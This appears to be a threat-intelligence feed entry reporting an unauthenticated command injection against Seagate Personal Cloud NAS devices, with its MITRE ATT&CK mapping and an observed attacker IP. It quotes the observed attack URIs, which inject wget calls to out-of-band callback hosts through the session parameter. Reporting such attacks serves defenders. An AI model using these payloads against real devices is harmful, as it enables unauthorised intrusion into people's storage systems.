Seagate NAS backupmgt Command Injection for 2026-03-02
Mar 02, 2026
WebExploit
Last Updated: 12:16 UTC
Unauthenticated OS command injection via the session parameter of /backupmgt/localJob.php on Seagate Personal Cloud NAS devices. The session=fail trigger bypasses authentication before reaching the vulnerable exec() call.
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/backupmgt/localJob.php?session=fail;wget+http://d6igebqgp6g990a2g0ugfknhy9ffk53fp.oast.pro;/backupmgt/localJob.php?session=fail;wget+http://d6igebqgp6g990a2g0ugq56kjtc3fu1co.oast.pro;
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.162 : AS39287 ab stract : Sweden